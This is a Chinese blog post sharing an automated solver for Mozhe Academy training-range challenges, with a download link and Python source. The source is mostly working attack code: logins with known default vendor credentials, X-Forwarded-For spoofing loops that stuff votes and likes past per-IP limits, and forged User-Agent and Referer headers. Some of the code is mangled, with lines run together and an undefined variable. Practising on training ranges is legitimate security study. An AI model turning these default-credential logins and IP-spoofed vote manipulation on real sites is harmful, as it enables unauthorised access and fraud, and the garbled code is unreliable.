墨者学院靶场自动解题

前言：

墨者学院是一个用于安全学习的网站，其中的在线网络安全攻防技能实训靶场极具特色。

• 最近做了一下网络安全类的题，但用brupsuit不满足的我决定写一个自动解题的程序

链接：https://pan.baidu.com/s/1yhE5395g12xvkv4F1FGvyA 
提取码：mvjr 

简单演示：

• https://www.mozhe.cn/bug/N2dmMnp1b1VYd2EzLzBNR3MvRVlIZz09bW96aGUmozhe
• 需要注册登录才能作题

• 进入一个靶场，并启动环境

• 启动InsectBaby.exe，并依次填入对应的题号、IP、端口

• 随后提交输出的key值即可

• 除了几道靠刷请求的题需要30~60秒，其他的都是秒解，所以在座的速度之王们还在等什么？

• 如果实在太久，有可能是请求阻塞了，建议重新运行一下程序

源码：

#某防火墙默认口令
def topic_1(ip,port):url = "http://{}:{}/login.php".format(ip, port)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "application/x-www-form-urlencoded","Content-Length": "53","Origin": "http://{}:{}".format(ip, port),"Connection": "close","Referer": "http://{}:{}/login.html".format(ip, port),"Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6; verification=89a5b242c7f88765bd270c6cce92328f","Upgrade-Insecure-Requests": "1", }# 产品默认口令收集data = {'usr': 'useradmin','pwd': 'venus.user','validate': 't2fa','language': '1'}response = requests.post(url=url, headers=headers, data=data)if response.status_code == 200:key = re.findall("KEY:\n\n(.*?)\n\n
", response.content.decode("utf-8"))return key[0]else:return#浏览器信息伪造
def topic_2(ip,port):host = "http://{}:{}/".format(ip,port)url = host + 'mp_weixin_qq_com.php'# 伪造User-Agentheaders = {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Accept-Encoding': 'gzip, deflate','Connection': 'close','Referer': host,'Upgrade-Insecure-Requests': '1'}response = requests.get(url=url, headers=headers)if response.status_code == 200:return response.content.decode("utf-8")else:return#HTTP动作练习
def topic_3(ip,port):get_context_url = "http://{}:{}/".format(ip,port)get_key_url = "http://{}:{}/".format(ip,port) + "//info.php"headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Accept-Encoding': 'gzip, deflate','Connection': 'close','Referer': 'http://124.70.71.251:46166/','Upgrade-Insecure-Requests': '1', }get_context_response = requests.get(url=get_context_url, headers=headers)response_txt = get_context_response.content.decode("utf-8")soup = BeautifulSoup(response_txt, 'html.parser')link_context = soup.select('h4[class="weui_media_title"]')link_context2 = str(link_context[0])link_context3 = link_context2.replace('
静夜思\n
', '')data = {'content': context}headers['Content-Type'] = 'application/x-www-form-urlencoded'headers['Content-Length'] = '9966'#POST的请求体用data来表示response = requests.post(url=get_key_url, headers=headers, data=data)if response.status_code == 200:return response.content.decode("utf-8")else:return#热点评论刷分漏洞分析溯源
def topic_4(ip,port):url = "http://{}:{}/like_do.php".format(ip, port)key_url = "http://{}:{}/news_comment.php".format(ip, port)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}data = {'id': '7'}if requests.get(url=key_url, headers=headers).status_code != 200:returnelse:for i in range(1, 3):headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0","Accept": "application/json, text/javascript, */*; q=0.01","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","X-Requested-With": "XMLHttpRequest","Content-Length": "4","Origin": "http://{}:{}".format(ip, port),"X-FORWARDED-FOR": "","Connection": "close","Referer": key_url}for j in range(101, 211):headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(i, j)while True:try:requests.post(url=url, headers=headers, data=data, timeout=(30, 50), verify=False)print("\r正在解题,请耐心等待", end='')breakexcept:print("\r{}".format("●"), end='')time.sleep(5)continueheaders['X-FORWARDED-FOR'] = '192.168.2.212'# 还差一票，超越500requests.post(url=url, headers=headers, data=data)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}response = requests.get(url=key_url, headers=headers)key = re.findall("KEY:(.*?)'", response.content.decode("utf-8"))return key[0]#投票常见漏洞分析溯源
def topic_5(ip,port):url = "http://{}:{}/wx_vote_do.php".format(ip, port)key_url = "http://{}:{}/wx_vote.php".format(ip, port)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}data = {'id': '6'}if requests.get(url=key_url, headers=headers).status_code != 200:returnelse:for i in range(1, 3):headers = {"User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/WIFI","Accept": "application/json, text/javascript, */*; q=0.01","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","X-Requested-With": "XMLHttpRequest","Content-Length": "4","Origin": "http://{}:{}".format(ip, port),"X-FORWARDED-FOR": "","Connection": "close","Referer": key_url,"Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6"}for j in range(101, 247):headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(i, j)while True:try:requests.post(url=url, headers=headers, data=data, timeout=(30, 50), verify=False)print("\r正在解题,请耐心等待", end='')breakexcept:print("\r{}".format("●"), end='')time.sleep(5)continueheaders['X-FORWARDED-FOR'] = '192.168.2.247'# 还差一票，获得第一名requests.post(url=url, headers=headers, data=data)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}response = requests.get(url=key_url, headers=headers)key = re.findall("key:(.*?)'", response.content.decode("utf-8"))return key[0]#来源页伪造
def topic_6(ip,port):url = 'http://{}:{}/x_search_index.php'.format(ip,port)headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Accept-Encoding':'gzip, deflate','Connection':'close','Referer':'http://google.com',  # 伪造referer'Upgrade-Insecure-Requests':'1'}response = requests.get(url=url,headers=headers)if response.status_code == 200:key = response.content.decode("utf-8")print(key)return Trueelse:return#投票系统程序设计缺陷分析
def topic_7(ip,port):url = "http://{}:{}/vote_do.php".format(ip, port)key_url = "http://{}:{}/vote.php".format(ip, port)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}data = {'id': '7'}if requests.get(url=key_url, headers=headers).status_code != 200:returnelse:for i in range(1, 3):headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0","Accept": "application/json, text/javascript, */*; q=0.01","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","X-Requested-With": "XMLHttpRequest","Content-Length": "4","Origin": "http://{}:{}".format(ip, port),"X-FORWARDED-FOR": "","Connection": "close","Referer": key_url}for j in range(101, 232):headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(i, j)while True:try:requests.post(url=url, headers=headers, data=data, timeout=(30, 50), verify=False)print("\r正在解题,请耐心等待", end='')breakexcept:print("\r{}".format("●"), end='')time.sleep(5)continueheaders['X-FORWARDED-FOR'] = '192.168.2.232'#还差一票，获得第一名requests.post(url=url, headers=headers, data=data)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}response = requests.get(url=key_url, headers=headers)key = re.findall("key:(.*?)'", response.content.decode("utf-8"))return key[0]#IP地址伪造(第1题)
def topic_8(ip,port):url = "http://{}:{}/login.php".format(ip, port)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "application/x-www-form-urlencoded","Content-Length": "43","Origin": "http://{}:{}".format(ip, port),"X-FORWARDED-FOR": "127.0.0.1","Connection": "close","Referer": "http://{}:{}/".format(ip, port),"Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6","Upgrade-Insecure-Requests": "1"}#产品默认口令收集data = {'action': 'login','user_name': 'admin','Password': 'admin'}response = requests.post(url=url, headers=headers, data=data)if response.status_code == 200:key = response.content.decode('utf-8')print(key)return Trueelse:return#IP地址伪造(第2题)
def topic_9(ip,port):url = 'http://{}:{}/login.php'.format(ip, port)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "application/x-www-form-urlencoded","Content-Length": "41","Origin": "http://{}:{}".format(ip, port),"X-FORWARDED-FOR": "59.125.39.5","Connection": "close","Referer": "http://{}:{}/".format(ip, port),"Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6","Upgrade-Insecure-Requests": "1", }#Burp实战中，使用弱口令爆破data = {'action': 'login','user_name': 'test','Password': 'test'}response = requests.post(url=url, headers=headers, data=data)if response.status_code == 200:key = response.content.decode('utf-8')print(key)return Trueelse:return#服务器返回数据查看
def topic_10(ip,port):url = "http://{}:{}/".format(ip, port)headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8","Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding": "gzip, deflate","Content-Type": "application/x-www-form-urlencoded","Content-Length": "13","Origin": "http://{}:{}".format(ip, port),"Connection": "close","Referer": "http://{}:{}/".format(ip, port),"Upgrade-Insecure-Requests": "1"}data = {'boolean': 'false'}response = requests.post(url=url, headers=headers, data=data)if response.status_code == 200:key = response.headers['key']return keyelse:return

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！